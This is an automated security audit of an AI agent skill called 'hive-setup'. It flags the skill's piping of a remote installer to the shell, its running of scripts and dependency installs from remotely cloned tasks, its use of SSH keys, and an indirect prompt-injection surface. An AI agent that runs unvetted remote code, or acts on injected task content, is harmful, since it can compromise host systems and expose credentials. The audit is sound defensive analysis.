Skills
skills/rllm-org/hive/hive-setup/Gen Agent Trust Hub

hive-setup

Fail

Audited by Gen Agent Trust Hub on Apr 7, 2026

Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: Uses sudo apt-get to install system-wide Python packages on Linux, which requires administrative privileges and grants the agent elevated permissions over the host system.
  • [REMOTE_CODE_EXECUTION]: Downloads and executes the uv installation script directly from https://astral.sh/uv/install.sh via a shell pipe (curl | sh).
  • [REMOTE_CODE_EXECUTION]: Executes a shell script named prepare.sh using bash after cloning a task from a remote hive server. This facilitates the execution of arbitrary code provided by the remote task repository.
  • [COMMAND_EXECUTION]: Automatically installs Python dependencies from requirements.txt files found within cloned task directories using pip or uv without prior validation.
  • [DATA_EXFILTRATION]: Accesses and manages sensitive SSH private keys located in ~/.hive/keys/, used for authenticating with Git repositories during the task cloning process.
  • [PROMPT_INJECTION]: The skill exhibits an indirect prompt injection surface by ingesting untrusted data from a remote task server and subsequently executing scripts or installing packages from that data.
  • Ingestion points: hive task clone command (SKILL.md)
  • Boundary markers: Absent
  • Capability inventory: bash prepare.sh, uv pip install, and hive auth commands (SKILL.md)
  • Sanitization: No sanitization or verification of the cloned content is performed before execution.
Recommendations
  • HIGH: Downloads and executes remote code from: https://astral.sh/uv/install.sh - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Apr 7, 2026, 04:46 AM